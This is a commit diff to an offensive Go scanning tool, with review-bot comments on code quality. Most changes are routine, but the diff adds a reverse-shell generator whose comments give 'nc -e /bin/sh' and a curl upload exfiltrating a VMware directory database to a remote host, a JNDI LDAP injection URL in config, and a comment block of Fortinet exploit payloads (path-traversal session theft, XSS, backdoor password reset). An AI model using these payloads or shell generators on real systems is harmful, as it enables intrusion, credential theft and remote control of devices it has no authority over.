

1、fuzz、及所有请求输出限制为800k,避免被反制、进行内存攻击导致程序崩溃
2、修复naabu、nmap扫描后使用ip继续走后续流程,导致无法正确访问目标的bug,https通常是限定只能域名访问的
3、file fuzz针对
aac、abw、arc、avif、avi、azw、bin、bmp、bz、bz2、cda、csh、css、csv、doc、docx、eot、epub、gz、gif、ico、ics、jar、jpeg、jpg、js、json、jsonld、mid、midi、mjs、mp3、mp4、mpeg、mpkg、odp、ods、odt、oga、ogv、ogx、opus、otf、png、pdf、php、ppt、pptx、rar、rtf、sh、svg、tar、tif、tiff、ts、ttf、txt、vsd、wav、weba、webm、webp、woff、woff2、xhtml、xls、xlsx、xml、xul、zip、3gp、3g2、7z
的Content-Type: 进行类型识别,跳过无用的fuzz,例如请求的是jpg,返回200的html
 2022-10-12
hktalent committed Oct 12, 2022
1 parent 2f5289e commit e32d6fa
Showing 69 changed files with 5,517 additions and 128 deletions.
8 changes: 6 additions & 2 deletions brute/filefuzz.go
Expand Up @@ -160,6 +160,7 @@ type FuzzData struct {
Req *util.Page
}

// https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types/Common_types
var r001 = regexp.MustCompile(`\.(aac)|(abw)|(arc)|(avif)|(avi)|(azw)|(bin)|(bmp)|(bz)|(bz2)|(cda)|(csh)|(css)|(csv)|(doc)|(docx)|(eot)|(epub)|(gz)|(gif)|(ico)|(ics)|(jar)|(jpeg)|(jpg)|(js)|(json)|(jsonld)|(mid)|(midi)|(mjs)|(mp3)|(mp4)|(mpeg)|(mpkg)|(odp)|(ods)|(odt)|(oga)|(ogv)|(ogx)|(opus)|(otf)|(png)|(pdf)|(php)|(ppt)|(pptx)|(rar)|(rtf)|(sh)|(svg)|(tar)|(tif)|(tiff)|(ts)|(ttf)|(txt)|(vsd)|(wav)|(weba)|(webm)|(webp)|(woff)|(woff2)|(xhtml)|(xls)|(xlsx)|(xml)|(xul)|(zip)|(3gp)|(3g2)|(7z)$`)

// 重写了fuzz:优化流程、优化算法、修复线程安全bug、增加智能功能
Expand Down Expand Up @@ -397,9 +398,12 @@ func FileFuzz(u string, indexStatusCode int, indexContentLength int, indexbody s
}
// 默认情况等待所有结束
wg.Wait()
log.Printf("fuzz is over: %s found:\n%s\n", u, strings.Join(path, "\n"))
if 0 < len(path) {
log.Printf("fuzz is over: %s found:\n%s\n", u, strings.Join(path, "\n"))
path = util.SliceRemoveDuplicates(path)
}
technologies = util.SliceRemoveDuplicates(technologies)
path = util.SliceRemoveDuplicates(path)

stop() //发停止指令
<-time.After(time.Second * 2)
stop2()
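Review bot: The `r001` pattern in the first hunk does not express "request path ends with one of these extensions": in Go's RE2 the `|` operator binds loosest, so `\.` attaches only to `aac` and `$` only to `7z`, while every other alternative matches as a bare substring anywhere in the input (`bin` in `/cgi-bin/`, `sh` in `/shop`, `ts` in `/posts`, `ics` in `/statistics`). Whatever consumes `r001` (its use is outside this hunk) will therefore treat many ordinary directory paths as extension hits and skip or misclassify them. Drop the per-alternative parentheses and write the list as one anchored group, `\.(aac|abw|…|7z)$`, ideally prefixed with `(?i)` since servers commonly serve `.JPG`/`.PDF` too; if the matched string can still carry a query string or fragment, strip it before matching or `$` will never fire. Add a one-line comment stating the intent, e.g. `// r001 matches a request path whose last dot-suffix is a static/binary file extension (MDN common MIME list).` The second hunk sits inside `FileFuzz`, whose body starts and ends outside this view.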
1 change: 1 addition & 0 deletions config/config.json
@@ -1,4 +1,5 @@
{
"ldapServer": "ldap://docker.for.mac.localhost:1389/%s/#UpX34defineClass",
"LimitReader": 819200,
"OnClient": true,
"ScanPoolSize":5000,
Binary file modified config/scan4all_db.db
Binary file not shown.
8 changes: 5 additions & 3 deletions go.mod
Expand Up @@ -27,7 +27,7 @@ require (
github.com/logrusorgru/aurora v2.0.3+incompatible
github.com/pkg/errors v0.9.1
github.com/projectdiscovery/retryablehttp-go v1.0.3-0.20220604122435-c175fc8f2d4a
github.com/projectdiscovery/uncover v0.0.5
github.com/projectdiscovery/uncover v0.0.6
github.com/stretchr/testify v1.8.0
)

Expand All @@ -38,12 +38,12 @@ require (
github.com/davecgh/go-spew v1.1.1 // indirect
github.com/golang/snappy v0.0.4 // indirect
github.com/json-iterator/go v1.1.12 // indirect
github.com/miekg/dns v1.1.50 // indirect
github.com/miekg/dns v1.1.50
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
github.com/modern-go/reflect2 v1.0.2 // indirect
github.com/pmezard/go-difflib v1.0.0 // indirect
github.com/projectdiscovery/hmap v0.0.2
github.com/projectdiscovery/retryabledns v1.0.15 // indirect
github.com/projectdiscovery/retryabledns v1.0.15
github.com/projectdiscovery/stringsutil v0.0.1
github.com/syndtr/goleveldb v1.0.0 // indirect
github.com/yl2chen/cidranger v1.0.2 // indirect
Expand Down Expand Up @@ -105,6 +105,7 @@ require (
github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267
github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358
github.com/icodeface/tls v0.0.0-20190904083142-17aec93c60e5
github.com/jinzhu/copier v0.3.5
github.com/jlaffaye/ftp v0.1.0
github.com/karlseguin/ccache v2.0.3+incompatible
github.com/lcvvvv/gonmap v1.2.1
Expand All @@ -118,6 +119,7 @@ require (
github.com/panjf2000/ants/v2 v2.5.0
github.com/projectdiscovery/folderutil v0.0.0-20220523100846-d6161a49c221
github.com/projectdiscovery/iputil v0.0.0-20220712175312-b9406f31cdd8
github.com/projectdiscovery/naabu/v2 v2.1.0
github.com/projectdiscovery/nuclei-updatecheck-api v0.0.0-20220726130814-981d44a34f84
github.com/projectdiscovery/nuclei/v2 v2.7.8
github.com/projectdiscovery/subfinder/v2 v2.5.3
8 changes: 8 additions & 0 deletions go.sum
Expand Up @@ -571,6 +571,8 @@ github.com/jcmturner/gokrb5/v8 v8.4.3 h1:iTonLeSJOn7MVUtyMT+arAn5AKAPrkilzhGw8wE
github.com/jcmturner/gokrb5/v8 v8.4.3/go.mod h1:dqRwJGXznQrzw6cWmyo6kH+E7jksEQG/CyVWsJEsJO0=
github.com/jcmturner/rpc/v2 v2.0.3 h1:7FXXj8Ti1IaVFpSAziCZWNzbNuZmnvw/i6CqLNdWfZY=
github.com/jcmturner/rpc/v2 v2.0.3/go.mod h1:VUJYCIDm3PVOEHw8sgt091/20OJjskO/YJki3ELg/Hc=
github.com/jinzhu/copier v0.3.5 h1:GlvfUwHk62RokgqVNvYsku0TATCF7bAHVwEXoBh3iJg=
github.com/jinzhu/copier v0.3.5/go.mod h1:DfbEm0FYsaqBcKcFuvmOZb218JkPGtvSHsKg8S8hyyg=
github.com/jinzhu/inflection v1.0.0 h1:K317FqzuhWc8YvSVlFMCCUb36O/S9MCKRDI7QkRKD/E=
github.com/jinzhu/inflection v1.0.0/go.mod h1:h+uFLlag+Qp1Va5pdKtLDYj+kHp5pxUVkryuEj+Srlc=
github.com/jinzhu/now v1.1.4/go.mod h1:d3SSVoowX0Lcu0IBviAWJpolVfI5UJVZZ7cO71lE/z8=
Expand Down Expand Up @@ -903,6 +905,10 @@ github.com/projectdiscovery/mapcidr v1.0.0/go.mod h1:5QkKrV6rNQQurCZI3nNedFsAOYp
github.com/projectdiscovery/mapcidr v1.0.1/go.mod h1:/qxlpxXZQFFjHynSc9u5O0kUPzH46VskECiwLiz7/vw=
github.com/projectdiscovery/mapcidr v1.0.2 h1:ewn7hoZz8P1TJ4VqG//XMlQKg5zhj2hnEx3C9jf3sQA=
github.com/projectdiscovery/mapcidr v1.0.2/go.mod h1:9OuUDjA+FilmXToex0xMfQb0os6qMaoiuZCksai0asY=
github.com/projectdiscovery/naabu/v2 v2.0.7 h1:I1xPIbDlFPpOG1lu4y5FwVKzQrNgZL83o8Y4Q/S2aoM=
github.com/projectdiscovery/naabu/v2 v2.0.7/go.mod h1:0svSCem0xTs84sIyGVHOdrXshNSb1MRQCGuhCRh8XXA=
github.com/projectdiscovery/naabu/v2 v2.1.0 h1:KC2GlJeKhxX9eBFqA1/ac5Vse9zSV3QBqRmMTL0QXMI=
github.com/projectdiscovery/naabu/v2 v2.1.0/go.mod h1:5I3HB2IQnWpg6YEYgDHgeBq7SOK7Rsp2wJE/89uwcdA=
github.com/projectdiscovery/networkpolicy v0.0.1/go.mod h1:asvdg5wMy3LPVMGALatebKeOYH5n5fV5RCTv6DbxpIs=
github.com/projectdiscovery/networkpolicy v0.0.2-0.20220525172507-b844eafc878d/go.mod h1:asvdg5wMy3LPVMGALatebKeOYH5n5fV5RCTv6DbxpIs=
github.com/projectdiscovery/networkpolicy v0.0.2-0.20220925181336-68b15b6cbe8c h1:zMIO2xtYwynjczOvIsCZiqMSbgupK3ZO/JPNotN/85c=
Expand Down Expand Up @@ -953,6 +959,8 @@ github.com/projectdiscovery/tlsx v0.0.8 h1:+YsPi1sQ6UZUPA6eA8t1RRdbuNzy2cFb9Dvvl
github.com/projectdiscovery/tlsx v0.0.8/go.mod h1:TlIEi84Vfhs5MVGbb41UAiLkDcSIF8feca6XhyNU2KY=
github.com/projectdiscovery/uncover v0.0.5 h1:x6+96/5WwHhZxkWubTnUdNmoGdg/UIO2rwkL9VOxwmk=
github.com/projectdiscovery/uncover v0.0.5/go.mod h1:LF8NewLQXa0mI5H/6ASDy9/4sxghCTAXAhGkhKG1kb8=
github.com/projectdiscovery/uncover v0.0.6 h1:V44qqGtm7xx0sVTVvuAlQ4p8LAgfShSDeXQP1l4SxOg=
github.com/projectdiscovery/uncover v0.0.6/go.mod h1:EXhp8F74rxWFRL7RMXQA8+2lPftH+PGjB7CyvecxkHo=
github.com/projectdiscovery/urlutil v0.0.0-20210525140139-b874f06ad921/go.mod h1:oXLErqOpqEAp/ueQlknysFxHO3CUNoSiDNnkiHG+Jpo=
github.com/projectdiscovery/urlutil v0.0.0-20220606114420-c8511bedff3f h1:yW/g2I+mqEL6E2SfSdEJZWZf5FUXJa2S+u8Rrx+3EtQ=
github.com/projectdiscovery/urlutil v0.0.0-20220606114420-c8511bedff3f/go.mod h1:AIXgGkomxeaCo1P/iMI3vClLciOF7DBx3N/rDWWsBqE=
5 changes: 4 additions & 1 deletion lib/api/main.go
Expand Up @@ -17,6 +17,9 @@ import (
// 逐步实现支持 多实例 接口 运行
func StartScan(oOpts *map[string]interface{}) {
util.DoSyncFunc(func() {
//buf1 := bytes.Buffer{}
//opt001 := naabu.DoNaabu(&buf1)

options := naaburunner.ParseOptions()
if options.Update {
util.UpdateScan4allVersionToLatest(true)
Expand Down Expand Up @@ -83,7 +86,7 @@ func StartScan(oOpts *map[string]interface{}) {
}
gologger.Info().Msg("Port scan over,web scan starting")
}
err = naabuRunner.Httpxrun()
err = naabuRunner.Httpxrun(nil, nil)
if err != nil {
gologger.Fatal().Msgf("naabuRunner.Httpxrun Could not run httpRunner: %s\n", err)
}
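Review bot: The two commented-out lines `//buf1 := bytes.Buffer{}` and `//opt001 := naabu.DoNaabu(&buf1)` added at the top of the closure are dead code that documents nothing; either wire them in or leave them out rather than check in a half-started experiment. The new call `naabuRunner.Httpxrun(nil, nil)` also gives a reader no hint what the two nils select; a short trailing comment such as `// nil, nil: consume the package-level Naabubuffer with default options` (confirm against Httpxrun) would make the call self-explanatory. `StartScan` begins and ends outside this hunk.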
14 changes: 14 additions & 0 deletions lib/reverse/util.go
@@ -0,0 +1,14 @@
package reverse

import (
"encoding/base64"
"fmt"
)

// cmd nc -e /bin/sh %s %s , rhost 192.168.0.111, rport 7777
// 获取敏感文件: curl -F "file=@/storage/db/vmware-vmdir/data.mdb" http://%s:%s/ , rhost 192.168.0.111, rport 7777
// cmd nc -e /bin/sh %s %s , rhost 192.168.0.111, rport 7777
func GenLinuxShell(rhost, rport, cmd string) string {
s1 := base64.StdEncoding.EncodeToString([]byte(fmt.Sprintf(cmd, rhost, rport)))
return fmt.Sprintf("bash -c {echo,%s}|{base64,-d}|{bash,-i}", s1)
}
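Review bot: `GenLinuxShell` is exported but carries no doc comment, and its contract is non-obvious: `cmd` is used as a printf format string, so a `cmd` with anything other than exactly two `%s` verbs silently produces a payload containing `%!s(MISSING)` or `%!(EXTRA string=...)` text instead of an error, and `go vet` will flag the non-constant format. Document that precondition and consider guarding it, e.g. `if strings.Count(cmd, "%s") != 2 { return "" }` is one option, but at minimum add: `// GenLinuxShell renders cmd, a format string with exactly two %s verbs that receive rhost and rport (e.g. "nc -e /bin/sh %s %s"), base64-encodes the result and wraps it in a brace-expansion bash pipeline so it survives shells that mangle spaces and quotes.` The `// cmd nc -e /bin/sh %s %s ...` comment line appears twice above the function; keep one copy. The `// 获取敏感文件: curl -F ...` line is better phrased as an example of a non-shell `cmd` value so readers do not take it as the function's behavior.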
3 changes: 1 addition & 2 deletions main.go
Expand Up @@ -8,7 +8,6 @@ import (
"log"
"net/http"
_ "net/http/pprof"
"os"
"runtime"
"runtime/debug"
)
Expand All @@ -25,7 +24,7 @@ func main() {
//os.Args = []string{"", "-host", "http://192.168.0.109", "-v"}
//os.Args = []string{"", "-host", "http://127.0.0.1", "-v"}
//os.Args = []string{"", "-host", "https://www.sina.com.cn/", "-v", "-o", "xxx.csv"}
os.Args = []string{"", "-list", "list.txt", "-v"}
//os.Args = []string{"", "-list", "list.txt", "-v"}

runtime.GOMAXPROCS(runtime.NumCPU())
util.DoInit(&config)
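Review bot: The change leaves four commented-out `os.Args = []string{...}` overrides in `main` and merely toggles which one is disabled; this is debugging residue that will keep churning the diff and invites someone to re-enable a hard-coded target. Delete them, or move the scenarios behind an environment variable or `//go:build debug` tag, instead of flipping comments. Separately, the context line `_ "net/http/pprof"` registers `/debug/pprof` on `http.DefaultServeMux`; if that mux is ever served on a non-loopback address (not visible here), heap and goroutine dumps of a scanner holding target lists and API keys become reachable, so it should be gated to localhost or a debug build. `main` continues past this hunk.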
2 changes: 1 addition & 1 deletion new.txt
Expand Up @@ -2,4 +2,4 @@
2、修复naabu、nmap扫描后使用ip继续走后续流程,导致无法正确访问目标的bug,https通常是限定只能域名访问的
3、file fuzz针对
aac、abw、arc、avif、avi、azw、bin、bmp、bz、bz2、cda、csh、css、csv、doc、docx、eot、epub、gz、gif、ico、ics、jar、jpeg、jpg、js、json、jsonld、mid、midi、mjs、mp3、mp4、mpeg、mpkg、odp、ods、odt、oga、ogv、ogx、opus、otf、png、pdf、php、ppt、pptx、rar、rtf、sh、svg、tar、tif、tiff、ts、ttf、txt、vsd、wav、weba、webm、webp、woff、woff2、xhtml、xls、xlsx、xml、xul、zip、3gp、3g2、7z
的Content-Type: 进行类型识别,跳过无用的fuzz
的Content-Type: 进行类型识别,跳过无用的fuzz,例如请求的是jpg,返回200的html
67 changes: 0 additions & 67 deletions pkg/httpx/internal/testutils/integration.go

This file was deleted.

24 changes: 0 additions & 24 deletions pkg/httpx/runner/banner.go

This file was deleted.

2 changes: 0 additions & 2 deletions pkg/httpx/runner/doc.go

This file was deleted.

3 changes: 2 additions & 1 deletion pkg/httpx/runner/options.go
@@ -1,6 +1,7 @@
package runner

import (
"github.com/hktalent/ProScan4all/lib/util"
"github.com/hktalent/ProScan4all/pkg/httpx/common/customheader"
"github.com/hktalent/ProScan4all/pkg/httpx/common/customlist"
customport "github.com/hktalent/ProScan4all/pkg/httpx/common/customports"
Expand Down Expand Up @@ -351,7 +352,7 @@ func ParseOptions() *Options {
//showBanner()

if options.Version {
gologger.Info().Msgf("Current Version: %s\n", Version)
gologger.Info().Msgf("Current Version: %s\n", util.Version)
os.Exit(0)
}

2 changes: 1 addition & 1 deletion pkg/naabu/v2/pkg/runner/options.go
Expand Up @@ -128,7 +128,7 @@ func ParseOptions() *Options {
flagSet.StringVar(&options.CeyeApi, "ceyeapi", "", "ceye.io api key"),
flagSet.StringVar(&options.CeyeDomain, "ceyedomain", "", "ceye.io subdomain"),
flagSet.BoolVar(&options.NoPOC, "np", false, "Skip pocs_go check"),
flagSet.BoolVarP(&options.ScanAllIPS, "sa", "scan-all-ips", true, "scan all the IP's associated with DNS record"),
flagSet.BoolVarP(&options.ScanAllIPS, "sa", "scan-all-ips", false, "scan all the IP's associated with DNS record"),
flagSet.StringVarP(&options.ScanType, "s", "scan-type", SynScan, "type of port scan (SYN/CONNECT)"),
flagSet.StringVar(&options.SourceIP, "source-ip", "", "source ip"),
flagSet.BoolVarP(&options.InterfacesList, "il", "interface-list", false, "list available interfaces and public ip"),
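Review bot: Flipping the `ScanAllIPS` default from `true` to `false` silently narrows coverage for any host with several A/AAAA records — only one resolved address is port-scanned — yet the help string is unchanged and neither it nor the commit message says so. Either state the new behaviour in the flag text, e.g. `"scan all the IP's associated with DNS record (default: only the first resolved IP)"`, or keep `true` and fix the IP-versus-hostname problem in the HTTP stage where it actually bites. Which single address is used when this is false appears to be `initialHosts[0]` in `resolveFQDN` (see the targets.go hunk), so results will depend on resolver ordering across runs; that is worth a note in the docs. `ParseOptions` starts and ends outside this hunk.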
9 changes: 7 additions & 2 deletions pkg/naabu/v2/pkg/runner/runner.go
Expand Up @@ -12,6 +12,7 @@ import (
"github.com/hktalent/ProScan4all/webScan"
"github.com/projectdiscovery/fileutil"
"github.com/projectdiscovery/iputil"
runner3 "github.com/projectdiscovery/naabu/v2/pkg/runner"
"github.com/projectdiscovery/retryablehttp-go"
"log"
"net"
Expand Down Expand Up @@ -53,8 +54,12 @@ type Runner struct {

var Naabubuffer = bytes.Buffer{}

func (r *Runner) Httpxrun() error {
httpxrunner.Naabubuffer = Naabubuffer
func (r *Runner) Httpxrun(buf *bytes.Buffer, options *runner3.Options) error {
if nil != buf {
httpxrunner.Naabubuffer = *buf
} else {
httpxrunner.Naabubuffer = Naabubuffer
}
var nucleiDone = make(chan bool, 1)
Cookie := util.GetVal("Cookie")
if "" != Cookie {
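Review bot: The new `options *runner3.Options` parameter is not referenced anywhere in the visible part of `Httpxrun`, and the only caller shown (`lib/api/main.go`) passes `nil, nil`; if it is also unused further down the body, drop it or name it `_` so the intent is clear. `httpxrunner.Naabubuffer = *buf` copies a `bytes.Buffer` by value, so the copy and the caller's buffer share the same backing array and read offset, and a later write or read on either side can clobber the other. Prefer `httpxrunner.Naabubuffer.Reset(); httpxrunner.Naabubuffer.Write(buf.Bytes())`, and give the exported method a doc comment: `// Httpxrun runs the httpx stage over the naabu results in buf, or over the package-level Naabubuffer when buf is nil.` Importing the upstream `naabu/v2/pkg/runner` as `runner3` next to this forked runner package also means two `Options` types with the same name are now in play; a more descriptive alias such as `upstreamrunner` avoids confusion. The body of `Httpxrun` continues past this hunk.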
1 change: 1 addition & 0 deletions pkg/naabu/v2/pkg/runner/targets.go
Expand Up @@ -440,6 +440,7 @@ func (r *Runner) resolveFQDN(target string) ([]string, error) {
hostIPS = append(hostIPS, initialHosts[0])
}

hostIPS = util.SliceRemoveDuplicates(hostIPS)
for _, hostIP := range hostIPS {
gologger.Debug().Msgf("Using host %s for enumeration\n", hostIP)
// dedupe all the hosts and also keep track of ip => host for the output - just append new hostname
26 changes: 26 additions & 0 deletions pocs_go/CVE-2018-13380.go
@@ -0,0 +1,26 @@
package pocs_go

/*
https://www.yisu.com/zixun/499765.html
https://github.com/ianxtianxt/CVE-2018-13379
CVE-2018-13379: Pre-auth任意文件读取,可以获得用户名和密码
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
CVE-2018-13380 Fortinet FortiOS xss漏洞
Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.8
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
/remote/loginredir?redir=6a6176617363726970743a616c65727428646f63756d656e742e646f6d61696e29
/message?title=x&msg=%26%23<svg/onload=alert(1)>;
CVE-2018-13382 Fortinet FortiOS magic后门
Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.9 Fortinet Fortios 5.4.11
/remote/login?lang=en
changePassword修改密码
/remote/logincheck
"Referer": "https://"+ip+"/remote/login?lang=en"
"If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT", "Content-Type": "text/plain;charset=UTF-8", "Connection": "close"
data = {"ajax": "1", "username": username, "realm": '', "credential": newpassword, "magic": "4tinet2095866", "reqid": "0", "credential2": newpassword}
if r.status_code==200 and 'redir=/remote/hostcheck_install' in r.text:
*/
